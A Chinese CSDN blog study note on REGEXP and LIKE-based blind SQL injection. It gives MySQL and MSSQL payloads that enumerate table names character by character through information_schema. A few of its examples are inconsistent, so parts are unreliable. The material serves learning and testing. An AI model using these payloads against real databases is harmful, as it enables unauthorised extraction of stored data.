盲注之正则表达式攻击(REGEXP注入)

最新推荐文章于 2024-04-25 19:56:43 发布
最新推荐文章于 2024-04-25 19:56:43 发布
阅读量3.6k 收藏 1
点赞数
分类专栏: web渗透学习笔记 文章标签: SQL注入 盲注 正则 regexp mssql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/100526540
版权

注入原理

什么是REGEXP注入?

首先说明一下,我并没发现这种注入是多么独特的一种方式。只是因为看到了,所以记下笔记,难受啊,越学看到的越多

REGEXP注入是一中注入方式,又叫盲注值正则表达式攻击

注入原理

应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下

and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^[a-z]' LIMIT 0,1)

经过测试,第一个字符是e,payload:

and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e' LIMIT 0,1)

expression like this:

'^e[a-z]' -> '^em[a-z]' -> '^ema[a-z]' -> '^emai[a-z]'-> '^email[a-z]' -> FALSE

实验表明:在limit 0,1下,regexp会匹配所有的项。我们在使用regexp时,要注意有可能有多个项,同时要一个个字符去爆破。类似于上述第一条和第二条。而此时limit 0,1此时是对于where table_schema='security' limit 0,1。table_schema='security'已经起到了限定作用了,limit有没有已经不重要了

MSSQL

MSSQL所用的正则表达式并不是标准正则表达式 ,该表达式使用 like关键词

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" and table_name LIKE '[a-z]%' )

该查询语句中,select top 1 是一个组合哦,不要看错了。

如果要查询其它的表名,由于不能像mysql哪样用limit x,1,只能使用 table_name not in (select top x table_name from information_schema.tables) 意义是:表名没有在前x行里,其实查询的就是第x+1行。

例如 查询第二行的表名:

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' )

表达式的顺序:

'^e[a-z]' -> '^em[a-z]' -> '^ema[a-z]' -> '^emai[a-z]'-> '^email[a-z]' -> TRUE

之所以表达式 news[a-z]查询后返回正确是应为%代表0-n个字符,使用"_"则只能代表一个字符。故确认后续是否还有字符克用如下表达式

'email%' TRUE -> 'email_' FALSE

同理可以用相同的方法获取字段,值。这里就不再详细描述了。

 

秋水sir
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过(正则盲注绕过)
yggcwhat
05-08 466
sql注入绕过(正则盲注绕过)
应用安全系列之十二:正则表达式注入
jimmyleeee的专栏
03-07 2566
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
SQL语言之正则表达式regexp的用法
最新发布
hhelipibe的博客
04-25 2100
首先必须声明一点,where的筛选条件必须是你所查的表里面有的,having的筛选条件,是已经得到查询结果了,想从查询结果里再进一步筛选,他们之间的筛选对象是不同的,大家别整混了。14、\.:表示句点字符。5、字段名 regexp '^[a-z]$':获取以英文小写字母开头并且只包含小写字母的字符串,注意[a-z]不是a减z,是a至z。11、[a-z]*:表示一个字符范围,匹配从 a 到 z 的任何字符 0 次或多次。12、[a-z]+:表示一个字符范围,匹配从 a 到 z 的任何字符 1 次或多次。
REGEXP注入与LIKE注入学习笔记
qwzf
08-08 3385
首发于先知社区 0x00 前言 之前已经学过SQL盲注了,也见过盲注REGEXP注入,但没详细了解过。正好这次BJD遇到了这个,简单总结,并把题目复现一下。 0x01 注入原理 REGEXP注入,即regexp正则表达式注入REGEXP注入,又叫盲注正则表达式攻击。 应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。 0x02 REGEXP注入分析 1、基本注入 select (s...
[NCTF2019]SQLi 1&regexp注入
plant1234的博客
10-03 1308
发现为ture时返回Location: welcome.php。随便输入一个用户,用admin的密码登陆得到flag。并且当密码和admin密码相同时就能得到flag。可以利用bool盲注进行注入,爆破passwd。发现没有过滤 " 和 \。
java:正则表达式检查SQL WHERE条件语句防止注入攻击和常量表达式
10km的专栏
12-16 4220
防止外部输入的SQL语句包含注入攻击代码,主要作法就是对字符串进行关键字检查,禁止不应该出现在SQL语句中的关键字如 `union` `delete`等等,同时还要允许这些字符串作为常量字符串中的内容出现在SQL 语句中。 对于 `where 1=1`这种用法,虽然不能算是注入攻击,但在有的情况下属于危险用法 比如在`DELETE`语句会删除全表数据。也应该被警告或禁止。 针对这种情况可以通过正则表达式实现对SQL语句的安全检查
软件测试工程师也要了解正则表达式
关注我!带你一路 "狂飙" 到底!
08-10 633
分组就是使用小括号将多个单独的字符或字符类组合成子表达式,以便可以像处理一个独立的单元那样,用"|"、"*"、"+"或者"?如果不设置这个标志,那么^只能匹配字符串的开头,$只能匹配字符串的结尾;如果设置了这个标志,那么^可以匹配多行字符串的 每一行的开头,$可以匹配多行字符串的每一行的结尾。否则返回一个数组,这个数组的第一个元素包含与正则表达式相匹配的字符串,其他元素包含的是匹配的各个分组(用括号括起来的子表达式)正则表达式的选择匹配符只有一个"|",使用"|"可以匹配指定的多个选项中的任意一项。
详解JavaScript正则表达式RegExp对象
11-25
 RegExp对象表示正则表达式RegExp是正则表达式的缩写,它是对字符串执行模式匹配的强大工具。RegExp对象用于规定在文本中检索的内容。当您检索某个文本时,可以使用一种模式来描述要检索的内容。RegExp就是这种...
正则表达式(RegExp)判断文本框中是否包含特殊符号
10-16
在编程领域,正则表达式(Regular Expression,简称 RegExp)是一种强大的文本处理工具,用于匹配、查找、替换等操作。在JavaScript中,正则表达式常用于数据验证,例如检查用户输入的文本框中是否包含特定的特殊...
JavaScript 正则表达式RegExp属性、方法及应用分析
10-29
RegExp对象(至今为止我看到过的最通俗易懂和深入的正则表达式教程)JavaScript提供了一个RegExp对象来完成有关正则表达式的操作和功能,每一条正则表达式模式对应一个RegExp实例。有两种方式可以创建RegExp对象的...
js正则表达式RegExp对象之compile方法 编译正则表达式
10-27
该方法可以编译指定的正则表达式,编译之后的正则表达式执行速度将会提高,如果正则表达式多次被调用,那么调用compile方法可以有效的提高代码的执行速度,如果该正则表达式只能被使用一次,则不会有明显的效果
表达式注入
weixin_42587866的博客
01-10 104
表达式注入是一种常见的应用安全漏洞,它指的是攻击者通过在程序的输入中注入恶意的表达式,来绕过程序的验证和过滤机制,达到执行意图不明的指令或访问敏感资源的目的。 表达式注入攻击方式有很多种,例如:SQL 注入、OS 命令注入、脚本注入等。 为了防范表达式注入攻击,系统设计人员需要采取一些措施,例如: 对输入进行严格的验证和过滤 尽可能地使用预编译的语句或存储过程来执行数据库操作 限制用户的输入长...
正则表达式注入REGEXP注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-14 1543
应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下 MySQL Payload and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e' LIMIT 0,1) ‘^e[a-z]’ -> ‘^em[a-z]’ -> ‘^ema[a-z]’ -> ‘^emai[a-z]’-> ‘^email[
regexp盲注的一些改进
weixin_30477797的博客
03-04 189
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*   这是之前看别人的文章写的exp,觉得有点啰嗦,其实可以很直白的写 select grou...
安全问题 正则表达式注入
weixin_33955681的博客
07-09 1673
正则表达式注入 数据被传递至应用程序并作为正则表达式使用。可能导致线程过度使用 CPU 资源,从而导致拒绝服务攻击。  下述代码java中字符串的split, replaceAll均支持正则的方式, 导致CPU挂起. 1 final String input = "0000000000000000000000000000000000000000000000"; 2 ...
正则表达式的灾难性回溯
baidu_27487573的博客
06-11 4912
最近项目上在做Fortify安全漏洞扫描。其中有一项漏洞扫描规则为:Denial of Service: Regular Expression。是由于正则表达式带来的DOS攻击。       由于Fortify的扫描不够绝对的智能,因此,它将所有出现了正则表达式的代码,甚至String.split(regex)统统认为有正则表达式带来的DOS攻击风险。        项目上有很多同事来询问该扫
一文详解SpEL表达式注入漏洞
华为云官方博客
02-21 905
本文介绍了SpEL表达式以及常见的SpEL注入攻击,详细地介绍了部分漏洞攻击实例以及常用的漏洞检测与防御手段。
详解正则表达式匹配算法原理
热门推荐
ybdesire的专栏
10-16 2万+
正则表达式的匹配算法,是怎么实现的呢?
js 正则表达式 new RegExp 中使用\1进行捕获
07-11
在 JavaScript 的正则表达式中,可以使用 `\1` 来引用前面的捕获组。捕获组是由括号 `( )` 包裹起来的正则表达式的一部分。当你在正则表达式中使用了多个捕获组时,可以通过 `\1`、`\2`、`\3` 等来引用它们。 下面是一个示例,演示了如何在 JavaScript 中使用 `\1` 进行捕获: ```javascript const regex = /(\w+)\s+\1/; // 匹配重复的单词 const str = 'hello hello'; if (regex.test(str)) { console.log('匹配成功'); } else { console.log('匹配失败'); } ``` 在上述示例中,正则表达式 `/(\w+)\s+\1/` 匹配重复的单词。`\w+` 匹配一个或多个单词字符,`\s+` 匹配一个或多个空白字符,`\1` 引用了第一个捕获组中匹配的内容(也就是第一个单词),从而要求后面再次出现该单词。 注意,在使用 `new RegExp` 构造函数创建正则表达式时,需要将正则表达式中的反斜杠转义一次。因此,上述示例在使用 `new RegExp` 创建正则表达式时应该写成: ```javascript const regex = new RegExp('(\\w+)\\s+\\1'); ``` 希望能帮到你!如果你有更多问题,请随时问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值